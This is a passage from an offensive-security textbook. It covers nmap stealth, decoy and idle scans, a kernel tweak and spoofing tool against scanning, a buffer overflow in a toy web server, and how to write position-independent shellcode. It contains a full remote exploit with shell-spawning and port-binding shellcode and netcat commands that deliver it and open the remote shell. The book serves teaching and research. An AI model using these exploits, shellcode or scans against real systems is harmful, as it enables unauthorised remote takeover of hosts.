will have an incorrect sequence number as well, causing the host machine
to ignore it
...
And since
the attacker sent out the first spoofed packet that caused all this chaos, it can
keep track of sequence numbers and continue spoofing packets from the
victim’s IP address to the host machine
...

0x470 Port Scanning
Port scanning is a way of figuring out which ports are listening and accepting
connections
...
The simplest form of port scanning involves trying to open TCP connections to every
possible port on the target system
...
Also, when connections are established, services will normally log
the IP address
...

A port scanning tool called nmap, written by Fyodor, implements all of
the following port-scanning techniques
...

0x471 Stealth SYN Scan
A SYN scan is also sometimes called a half-open scan
...
Recall the TCP/IP handshake: When a
full connection is made, first a SYN packet is sent, then a SYN/ACK packet is
sent back, and finally an ACK packet is returned to complete the handshake
and open the connection
...
Instead, only the initial SYN packet is sent,
and the response is examined
...
This is recorded, and an RST packet
is sent to tear down the connection to prevent the service from accidentally
being DoSed
...
The program must be run as root, since the program isn’t using
standard sockets and needs raw network access
...
168
...
72
Starting Nmap 4
...
org ) at 2007-05-29 09:19 PDT
Interesting ports on 192
...
42
...
094 seconds

0x472 FIN, X-mas, and Null Scans
In response to SYN scanning, new tools to detect and log half-open connections
were created
...
These all involve sending a nonsensical
packet to every port on the target system
...
However, if the port is closed and the implementation follows
protocol (RFC 793), an RST packet will be sent
...

The FIN scan sends a FIN packet, the X-mas scan sends a packet with
FIN, URG, and PUSH turned on (so named because the flags are lit up like a
Christmas tree), and the Null scan sends a packet with no TCP flags set
...
For instance,
Microsoft’s implementation of TCP doesn’t send RST packets like it should,
making this form of scanning ineffective
...
Their output looks
basically the same as the previous scan
...
This technique
simply spoofs connections from various decoy IP addresses in between each
real port-scanning connection
...
However, the spoofed decoy
addresses must use real IP addresses of live hosts; otherwise, the target may
be accidentally SYN flooded
...

The sample nmap command shown below scans the IP 192
...
42
...
168
...
10 and 192
...
42
...

reader@hacking:~/booksrc $ sudo nmap -D 192
...
42
...
168
...
11 192
...
42
...
The attacker needs to find a
usable idle host that is not sending or receiving any other network traffic and
that has a TCP implementation that produces predictable IP IDs that change
by a known increment with each packet
...

Predictable IP IDs have never really been considered a security risk, and idle
scanning takes advantage of this misconception
...

First, the attacker gets the current IP ID of the idle host by contacting it
with a SYN packet or an unsolicited SYN/ACK packet and observing the IP
ID of the response
...

Then, the attacker sends a spoofed SYN packet with the idle host’s IP
address to a port on the target machine
...
But since the idle host didn’t actually send out the initial SYN
packet, this response appears to be unsolicited to the idle host, and it
responds by sending back an RST packet
...

At this point, the attacker contacts the idle host again to determine how
much the IP ID has incremented
...
This
implies that the port on the target machine is closed
...
This implies that the port on the
target machine is open
...

Of course, if the idle host isn’t truly idle, the results will be skewed
...
If 20 packets are sent, then a change of 20 incremental steps should be
an indication of an open port, and none, of a closed port
...

If this technique is used properly on an idle host that doesn’t have any
logging capabilities, the attacker can scan any target without ever revealing
his or her IP address
...
com 192
...
42
...
Knowing what ports are open allows an attacker to determine which services can
be attacked
...
While writing this chapter, I wondered
if it is possible to prevent port scans before they actually happen
...

First of all, the FIN, Null, and X-mas scans can be prevented by a simple
kernel modification
...
The following output uses grep to find the kernel code
responsible for sending reset packets
...
*send_reset" /usr/src/linux/net/ipv4/tcp_ipv4
...
th;
550-   struct {
551-      struct tcphdr th;
552-#ifdef CONFIG_TCP_MD5SIG
553-      __be32 opt[(TCPOLEN_MD5SIG_ALIGNED >> 2)];
554-#endif
555-   } rep;
556-   struct ip_reply_arg arg;
557-#ifdef CONFIG_TCP_MD5SIG
558-   struct tcp_md5sig_key *key;
559-#endif
560-   return; // Modification: Never send RST, always return
...
*/
562-   if (th->rst)
563-      return;
564-
565-   if (((struct rtable *)skb->dst)->rt_type != RTN_LOCAL)
566-      return;
567-
reader@hacking:~/booksrc $

By adding the return command (shown above in bold), the
tcp_v4_send_reset() kernel function will simply return instead of doing
anything
...

FIN Scan Before the Kernel Modification
matrix@euclid:~ $ sudo nmap -T5 -sF 192
...
42
...
11 ( http://www
...
org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192
...
42
...
462 seconds
matrix@euclid:~ $

FIN Scan After the Kernel Modification
matrix@euclid:~ $ sudo nmap -T5 -sF 192
...
42
...
11 ( http://www
...
org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192
...
42
...
462 seconds
matrix@euclid:~ $

This works fine for scans that rely on RST packets, but preventing information leakage with SYN scans and full-connect scans is a bit more difficult
...
But if all of the closed ports also
responded with SYN/ACK packets, the amount of useful information an
attacker could retrieve from port scans would be minimized
...

Ideally, this should all be done without using a TCP stack
...
It’s a modification of the rst_hijack
...

The callback function spoofs a legitimate-looking SYN/ACK response to any
SYN packet that makes it through the BPF
...

shroud
...
h>
#include ...
h"
#define MAX_EXISTING_PORTS 30
void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *, u_short *);
struct data_pass {
int libnet_handle;
u_char *packet;
};
int main(int argc, char *argv[]) {
struct pcap_pkthdr cap_header;
const u_char *packet, *pkt_data;
pcap_t *pcap_handle;

char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
char *device;
u_long target_ip;
int network, i;
struct data_pass critical_libnet_data;
u_short existing_ports[MAX_EXISTING_PORTS];
if((argc < 2) || (argc > MAX_EXISTING_PORTS+2)) {
if(argc > 2)
printf("Limited to tracking %d existing ports
...
]\n", argv[0]);
exit(0);
}
target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);
if (target_ip == -1)
fatal("Invalid target address");
for(i=2; i < argc; i++)
existing_ports[i-2] = (u_short) atoi(argv[i]);
existing_ports[argc-2] = 0;
device = pcap_lookupdev(errbuf);
if(device == NULL)
fatal(errbuf);
pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
if(pcap_handle == NULL)
fatal(errbuf);
critical_libnet_data
...
libnet_handle == -1)
libnet_error(LIBNET_ERR_FATAL, "can't open network interface
...
\n");
libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data
...
packet == NULL)
libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory
...
");
printf("bing!\n");
}

There are a few tricky parts in the code above, but you should be able to
follow all of it
...

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o shroud shroud
...
/shroud 192
...
42
...
168
...
72 and tcp[tcpflags] & tcp-syn != 0 and
tcp[tcpflags] & tcp-ack = 0 and not (dst port 22 or dst port 80)'

While shroud is running, any port scanning attempts will show every port
to be open
...
168
...
189
Starting nmap V
...
00 ( www
...
org/nmap/ )
Interesting ports on (192
...
0
...
A dedicated attacker could simply telnet to every
port to check the banners, but this technique could easily be expanded to
spoof banners also
...
You’ve seen for yourself how crazy some of the typecasts
can get
...
And since many network programs need to run as root, these little mistakes can become critical vulnerabilities
...
Did you
notice it?
From hacking-network
...
It will receive from the socket until the EOL byte
* sequence is seen
...

* Returns the size of the read line (without EOL bytes)
...

if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
eol_matched++;
if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
*(ptr+1-EOL_SIZE) = '\0'; // terminate the string
...

}
} else {
eol_matched = 0;
}
ptr++; // Increment the pointer to the next byte
...

}

The recv_line() function in hacking-network
...
This means received bytes
can overflow if they exceed the dest_buffer size
...

0x481 Analysis with GDB
To exploit the vulnerability in the tinyweb
...
First, we need to
know the offset from the start of a buffer we control to the stored return
address
...
For
example, the program requires root privileges, so the debugger must be run
as root
...
There are other slight
differences that can shift memory around in the debugger like this, creating
inconsistencies that can be maddening to track down
...

One elegant solution to this problem is to attach to the process after it’s
already running
...
The source is
recompiled using the -g option to include debugging symbols that GDB
can apply to the running process
...
0 0
...
/tinyweb
reader 13104 0
...
0
2880
748 pts/2
R+
20:27 0:00 grep tinyweb
reader@hacking:~/booksrc $ gcc -g tinyweb
...
/a
...
so
...

Attaching to process 13019
/cow/home/reader/booksrc/tinyweb: No such file or directory
...
Kill it? (y or n) n
Program not killed
...
c:44
(gdb) list 44
39         if (listen(sockfd, 20) == -1)
40            fatal("listening on socket");
41
42         while(1) {   // Accept loop
43            sin_size = sizeof(struct sockaddr_in);
44            new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
45            if(new_sockfd == -1)
46               fatal("accepting connection");
47
48            handle_connection(new_sockfd, &client_addr);
(gdb) list handle_connection
53      /* This function handles the connection on the passed socket from the
54       * passed client address
...
Finally, the
56
* passed socket is closed at the end of the function
...
c, line 62
...

After attaching to the running process, a stack backtrace shows the program is currently in main(), waiting for a connection
...

At this point, the program’s execution must be advanced by making a web
request using wget in another terminal or a browser
...

Breakpoint 2, handle_connection (sockfd=4, client_addr_ptr=0xbffff810) at tinyweb
...
c:62
#1 0x08048cf6 in main () at tinyweb
...
Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 13019
reader@hacking:~/booksrc $

At the breakpoint, the request buffer begins at 0xbffff5c0
...
Since we know how the local variables are generally laid out on
the stack, we know the request buffer is near the end of the frame
...
Since we already know the general area to look, a
quick inspection shows the stored return address is at 0xbffff7dc
...
However, there are a few bytes near the beginning of the buffer that
might be mangled by the rest of the function
...
To account for this, it’s
best to just avoid the beginning of the buffer
...
This means 0xbffff688 is the target return address
...
It fills the exploit buffer with
null bytes, so anything written into it will automatically be null-terminated
...
This builds the NOP
sled and fills the buffer up to the return address overwrite location
...

tinyweb_exploit
...
h>
...
h>
...
h>
...
h>

#include "hacking
...
h"
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode
#define OFFSET 540
#define RETADDR 0xbffff688
int main(int argc, char *argv[]) {
int sockfd, buflen;
struct hostent *host_info;
struct sockaddr_in target_addr;
unsigned char buffer[600];
if(argc < 2) {
printf("Usage: %s <hostname>\n", argv[0]);
exit(1);
}
if((host_info = gethostbyname(argv[1])) == NULL)
fatal("looking up hostname");
if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
fatal("in socket");
target_addr
...
sin_port = htons(80);
target_addr
...
sin_zero), '\0', 8); // Zero the rest of the struct
...

memset(buffer, '\x90', OFFSET); // Build a NOP sled
...

strcat(buffer, "\r\n"); // Terminate the string
...

send_string(sockfd, buffer); // Send exploit buffer as an HTTP request
...
The exploit
also dumps out the bytes of the exploit buffer before it sends it
...
Here’s the output from the attacker’s terminal:
reader@hacking:~/booksrc $ gcc tinyweb_exploit
...
/a
...
0
...
1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 31 c0 31 db
31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 2f 2f 73 68
68 2f 62 69 6e 89 e3 51 89 e2 53 89 e1 cd 80 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 88 f6 ff bf
0d 0a
reader@hacking:~/booksrc $

Back on the terminal running the tinyweb program, the output shows the
exploit buffer was received and the shellcode is executed
...
Unfortunately, we aren’t
at the console, so this won’t do us any good
...
/tinyweb
Accepting web requests on port 80
Got request from 127
...
0
...
1"
Opening '
...
html'
200 OK
Got request from 127
...
0
...
jpg HTTP/1
...
/webroot/image
...
0
...
1:58504
"
1 1 1

j
XQh//shh/bin

Q

S
"

NOT HTTP!
sh-3
...
Since we’re not at the console, shellcode is just a self-contained program, designed to take over another program to open a shell
...
There are many different types of shellcode
that can be used in different situations (or payloads)
...

0x483 Port-Binding Shellcode
When exploiting a remote program, spawning a shell locally is pointless
...
Assuming you already have port-binding
shellcode ready, using it is simply a matter of replacing the shellcode bytes
defined in the exploit
...
These shellcode bytes are shown in the output below
...
1
...
j
...
jfXCRfhzifS
...
|
00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV
...
|
00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |
...
j
...
?|
00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |
...
Rh//shh/b|
00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80
|in
...
S
...
c program, resulting in tinyweb_exploit2
...
The
new shellcode line is shown below
...
c
char shellcode[]=
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"
"\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f"
"\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
// Port-binding shellcode on port 31337

When this exploit is compiled and run against a host running tinyweb
server, the shellcode listens on port 31337 for a TCP connection
...
This program is netcat (nc for short), which works like the cat program but over the
network
...
The output of this exploit is shown below
...

reader@hacking:~/booksrc $ gcc tinyweb_exploit2
...
/a
...
0
...
1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 6a 66 58 99 |
...

31 db 43 52 6a 01 6a 02 89 e1 cd 80 96 6a 66 58 | 1
...
j
...
j
...

cd 80 b0 66 43 43 53 56 89 e1 cd 80 b0 66 43 52 |
...
fCR
52 56 89 e1 cd 80 93 6a 02 59 b0 3f cd 80 49 79 | RV
...
Y
...
Rh//shh/bin
...
S
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |
...

0d 0a
|
...
0
...
1 31337
localhost [127
...
0
...

A program like netcat can be used for many other things
...
Using netcat and the port-binding shellcode in a file, the same
exploit can be carried out on the command line
...
\r\n"')

jfX 1 CRj j
RfhzifS

j QV

fCCSV

fCRRV

jfXC

j Y ? Iy
Rh//shh/bin

R

S

reader@hacking:~/booksrc $ (perl -e 'print "\x90"x300'; cat portbinding_shellcode;
perl -e 'print "\x88\xf6\xff\xbf"x38
...
0
...
1 80
localhost [127
...
0
...
0
...
1 31337
localhost [127
...
0
...
The return address is found 540 bytes from the start of
the buffer, so with a 300-byte NOP sled and 92 bytes of shellcode, there are
152 bytes to the return address overwrite
...
Finally, the buffer is terminated with '\r\n'
...
netcat connects to the tinyweb program and sends the buffer
...
Then, netcat is used again
to connect to the shell bound on port 31337
...
We have seen
standard shell-spawning shellcode for local exploits
and port-binding shellcode for remote ones
...
Shellcode usually
spawns a shell, as that is an elegant way to hand off control; but it can do anything a program can do
...
These hackers are just scratching the surface of what’s possible
...

Perhaps you want your shellcode to add an admin account to /etc/passwd
or to automatically remove lines from log files
...
In
addition, writing shellcode develops assembly language skills and employs a
number of hacking techniques worth knowing
...
C
The shellcode bytes are actually architecture-specific machine instructions,
so shellcode is written using the assembly language
...

The operating system manages things like input, output, process control, file
access, and network communication in the kernel
...
Different
operating systems have different sets of system calls
...
A C program that uses printf() to output a string can be compiled for many different
systems, since the library knows the appropriate system calls for various architectures
...

By definition, assembly language is already specific to a certain processor
architecture, so portability is impossible
...
To begin our comparison,
let’s write a simple C program, then rewrite it in x86 assembly
...
c
#include ...
The strace program is used to trace a program’s system calls
...

reader@hacking:~/booksrc $ gcc helloworld
...
/a
...
/a
...
/a
...
so
...
so
...
so
...
}) = 0
mmap2(NULL, 61323, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ee7000
close(3)                                = 0
access("/etc/ld
...
nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc
...
6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20Z\1\000"
...
}) = 0
mmap2(NULL, 1258876, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7db3000
mmap2(0xb7ee0000, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x12c) = 0xb7ee0000
mmap2(0xb7ee4000, 9596, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee4000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db2000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db26b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7ee0000, 8192, PROT_READ)   = 0
munmap(0xb7ee7000, 61323)               = 0
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2),
...

The system calls at the start are setting up the environment and memory
for the program, but the important part is the write() syscall shown in bold
...

The Unix manual pages (accessed with the man command) are separated into sections
...
h>
ssize_t write(int fd, const void *buf, size_t count);
DESCRIPTION
write() writes up to count bytes to the file referenced by the file
descriptor fd from the buffer starting at buf
...
Note that not all file systems are POSIX conforming
...
The buf
and count arguments are a pointer to our string and its length
...
File descriptors are used
for almost everything in Unix: input, output, file access, network sockets,
and so on
...

Opening a file descriptor is like checking in your coat, since you are given
a number that can later be used to reference your coat
...
These values are standard and have been defined in several
places, such as the /usr/include/unistd
...

From /usr/include/unistd
...
*/
#define STDIN_FILENO 0 /* Standard input
...
*/
#define STDERR_FILENO 2 /* Standard error output
...
The standard
error file descriptor of 2 is used to display the error or debugging messages
that can be filtered from the standard output
...
These syscalls are listed in
/usr/include/asm-i386/unistd
...

From /usr/include/asm-i386/unistd
...

*/
#define __NR_restart_syscall      0
#define __NR_exit                 1
#define __NR_fork                 2
#define __NR_read                 3
#define __NR_write                4
#define __NR_open                 5
#define __NR_close                6
#define __NR_waitpid              7
#define __NR_creat                8
#define __NR_link                 9
#define __NR_unlink              10
#define __NR_execve              11
#define __NR_chdir               12
#define __NR_time                13
#define __NR_mknod               14
#define __NR_chmod               15
#define __NR_lchown              16
#define __NR_break               17
#define __NR_oldstat             18
#define __NR_lseek               19
#define __NR_getpid              20
#define __NR_mount               21
#define __NR_umount              22
#define __NR_setuid              23
#define __NR_getuid              24

...
c in assembly, we will make a system call to
the write() function for the output and then a second system call to exit()
so the process quits cleanly
...

Assembly instructions for the x86 processor have one, two, three, or no
operands
...
The x86 processor has several 32-bit registers
that can be viewed as hardware variables
...

The mov instruction copies a value between its two operands
...
The int instruction sends an interrupt signal to the kernel, defined
by its single operand
...
When the int 0x80 instruction is executed, the
kernel will make a system call based on the first four registers
...
All of these registers can be set using the mov instruction
...
The string "Hello, world!" with a newline character (0x0a) is in the
data segment, and the actual assembly instructions are in the text segment
...

helloworld
...
data
msg
db
section
...

Put 1 into ebx, since stdout is 1
...

Put 14 into edx, since our string is 14 bytes
...

; SYSCALL: exit(0)
mov eax, 1
; Put 1 into eax, since exit is syscall #1
...

int 0x80
; Do the syscall
...
For the write() syscall
to standard output, the value of 4 is put in EAX since the write() function is
system call number 4
...
Next, the
address of the string in the data segment is put into ECX, and the length of the
string (in this case, 14 bytes) is put into EDX
...

To exit cleanly, the exit() function needs to be called with a single
argument of 0
...
Then the system call interrupt is triggered again
...
When compiling C code, the GCC
compiler takes care of all of this automatically
...

The nasm assembler with the -f elf argument will assemble the
helloworld
...

By default, this object file will be called helloworld
...
The linker program
ld will produce an executable a
...

reader@hacking:~/booksrc $ nasm -f elf helloworld
...
o
reader@hacking:~/booksrc $
...
out
Hello, world!
reader@hacking:~/booksrc $

This tiny program works, but it’s not shellcode, since it isn’t self-contained
and must be linked
...
Since shellcode isn’t really an executable program, we don’t have the luxury of declaring the layout of data in memory or
even using other memory segments
...

This is commonly referred to as position-independent code
...
This is fine as long as EIP doesn’t
try to interpret the string as instructions
...
When the shellcode gets executed, it could be anywhere in memory
...
Since EIP cannot be accessed from assembly instructions,
however, we need to use some sort of trick
...

Instruction

Description

push

Push the source operand to the stack
...

call

Call a function, jumping the execution to the address in the location
operand
...
The address of the
instruction following the call is pushed to the stack, so that execution can
return later
...

Stack-based exploits are made possible by the call and ret instructions
...
After the function is finished, the ret
instruction pops the return address from the stack and jumps EIP back there
...

This architecture can be misused in another way to solve the problem of
addressing the inline string data
...
Instead of calling a function, we can jump past the string to a pop
instruction that will take the address off the stack and into a register
...

helloworld1
...

call mark_below
; Call below the string to instructions
db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes
...

; Write syscall #
...
This also
pushes the address of the next instruction to the stack, the next instruction
in our case being the beginning of the string
...
Without using
any memory segments, these raw instructions, injected into an existing process,
will execute in a completely position-independent way
...

reader@hacking:~/booksrc $ nasm helloworld1
...
Hello, worl|
|d!
...
|
|
...
|

The nasm assembler converts assembly language into machine code and
a corresponding tool called ndisasm converts machine code into assembly
...
The disassembly instructions marked
in bold are the bytes of the "Hello, world!" string interpreted as instructions
...

reader@hacking:~/booksrc $ export SHELLCODE=$(cat helloworld1)
reader@hacking:~/booksrc $
...
/notesearch
SHELLCODE will be at 0xbffff9c6
reader@hacking:~/booksrc $
...
Why do you think it crashed? In situations like this, GDB is your
best friend
...

0x522 Investigating with GDB
Since the notesearch program runs as root, we can’t debug it as a normal
user
...
Another way to debug programs is with core dumps
...
This means that dumped core
files are allowed to get as big as needed
...

reader@hacking:~/booksrc $ sudo su
root@hacking:/home/reader/booksrc # ulimit -c unlimited
root@hacking:/home/reader/booksrc # export SHELLCODE=$(cat helloworld1)
root@hacking:/home/reader/booksrc #
...
/notesearch
SHELLCODE will be at 0xbffff9a3
root@hacking:/home/reader/booksrc #
...
/core
-rw------- 1 root root 147456 2007-10-26 08:36
...
/core
(no debugging symbols found)
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...
/notesearch
£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E¿£°E
...

#0 0x2c6541b7 in ?? ()
(gdb) set dis intel
(gdb) x/5i 0xbffff9a3
0xbffff9a3:     call   0x2c6541b7
0xbffff9a8:     ins    BYTE PTR es:[edi],[dx]
0xbffff9a9:     outs   [dx],DWORD PTR ds:[esi]
0xbffff9aa:     sub    al,0x20
0xbffff9ac:     ja     0xbffffa1d
(gdb) i r eip
eip            0x2c6541b7       0x2c6541b7
(gdb) x/32xb 0xbffff9a3
0xbffff9a3:     0xe8    0x0f    0x48    0x65    0x6c    0x6c    0x6f    0x2c
0xbffff9ab:     0x20    0x77    0x6f    0x72    0x6c    0x64    0x21    0x0a
0xbffff9b3:     0x0d    0x59    0xb8    0x04    0xbb    0x01    0xba    0x0f
0xbffff9bb:     0xcd    0x80    0xb8    0x01    0xbb    0xcd    0x80    0x00
(gdb) quit
root@hacking:/home/reader/booksrc # hexdump -C helloworld1
00000000  e8 0f 00 00 00 48 65 6c  6c 6f 2c 20 77 6f 72 6c
00000010  64 21 0a 0d 59 b8 04 00  00 00 bb 01 00 00 00 ba
00000020  0f 00 00 00 cd 80 b8 01  00 00 00 bb 00 00 00 00
00000030  cd 80
00000032
root@hacking:/home/reader/booksrc #
...
Since we
are running GDB as root, the
...
The memory where
the shellcode should be is examined
...
At least,
execution was redirected, but something went wrong with the shellcode bytes
...
This, however, totally destroys the
meaning of the machine code
...
Such functions will simply terminate
at the first null byte, producing incomplete and unusable shellcode in memory
...
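The effect of a string-based copy can be checked directly against the hexdump bytes. The following is only a minimal sketch, not code from the book: the helper name bytes_before_first_null and the array helloworld1_head are made up for illustration, and the array holds just the first 16 bytes shown by hexdump.

```c
#include <assert.h>
#include <stddef.h>

/* First 16 bytes of helloworld1, copied from the hexdump output. */
static const unsigned char helloworld1_head[16] = {
    0xe8, 0x0f, 0x00, 0x00, 0x00, 0x48, 0x65, 0x6c,
    0x6c, 0x6f, 0x2c, 0x20, 0x77, 0x6f, 0x72, 0x6c
};

/* Hypothetical helper: how many bytes a string function such as strcpy()
 * would carry over, i.e. the number of bytes before the first null. */
size_t bytes_before_first_null(const unsigned char *code, size_t len)
{
    size_t i;

    assert(code != NULL);
    for (i = 0; i < len; i++) {
        if (code[i] == 0x00)
            break;
    }
    return i;
}
```

Called as bytes_before_first_null(helloworld1_head, sizeof(helloworld1_head)), the helper reports 2, because the third byte of the call instruction is already a null.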

0x523 Removing Null Bytes
Looking at the disassembly, it is obvious that the first null bytes come from
the call instruction
...
The call instruction allows for much longer jump distances,
which means that a small value like 19 will have to be padded with leading
zeros resulting in null bytes
...
A
small negative number will have its leading bits turned on, resulting in 0xff
bytes
...
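The difference between a small positive and a small negative displacement is easy to see by encoding both. This is a rough sketch under the assumption that the displacement is stored as a 32-bit little-endian two's complement value after the call opcode; encode_rel32 and count_nulls are illustrative names, not part of the book's source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a signed 32-bit displacement in little-endian order, the way it
 * follows the 0xe8 call opcode. */
void encode_rel32(int32_t disp, unsigned char out[4])
{
    uint32_t u = (uint32_t)disp;   /* two's complement bit pattern */

    assert(out != NULL);
    out[0] = (unsigned char)(u & 0xff);
    out[1] = (unsigned char)((u >> 8) & 0xff);
    out[2] = (unsigned char)((u >> 16) & 0xff);
    out[3] = (unsigned char)((u >> 24) & 0xff);
}

/* Count the null bytes in an encoded displacement. */
size_t count_nulls(const unsigned char *bytes, size_t len)
{
    size_t i, n = 0;

    assert(bytes != NULL);
    for (i = 0; i < len; i++) {
        if (bytes[i] == 0x00)
            n++;
    }
    return n;
}
```

Encoding 19 gives 13 00 00 00, with three null bytes, while encoding -35 gives dd ff ff ff, with none.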

The following revision of the helloworld shellcode uses a standard implementation of this trick: Jump to the end of the shellcode to a call instruction which,
in turn, will jump back to a pop instruction at the beginning of the shellcode
...
s
BITS 32             ; Tell nasm this is 32-bit code
...

two:
; ssize_t write(int fd, const void *buf, size_t count);
  pop ecx           ; Pop the return address (string ptr) into ecx
  mov eax, 4        ; Write syscall #
  mov ebx, 1        ; STDOUT file descriptor
  mov edx, 15       ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 15)

; void _exit(int status);
  mov eax, 1        ; Exit syscall #
  mov ebx, 0        ; Status = 0
  int 0x80          ; Do syscall: exit(0)

one:
  call two          ; Call back upwards to avoid null bytes
  db "Hello, world!", 0x0a, 0x0d ; with newline and carriage return bytes
...
This solves the
first and most difficult null-byte problem for this shellcode, but there are still
many other null bytes (shown in bold)
...
s
reader@hacking:~/booksrc $ ndisasm -b32 helloworld2
00000000  EB1E              jmp short 0x20
00000002  59                pop ecx
00000003  B804000000        mov eax,0x4
00000008  BB01000000        mov ebx,0x1
0000000D  BA0F000000        mov edx,0xf
00000012  CD80              int 0x80
00000014  B801000000        mov eax,0x1
00000019  BB00000000        mov ebx,0x0
0000001E  CD80              int 0x80
00000020  E8DDFFFFFF        call 0x2
00000025  48                dec eax
00000026  656C              gs insb
00000028  6C                insb
00000029  6F                outsd
0000002A  2C20              sub al,0x20
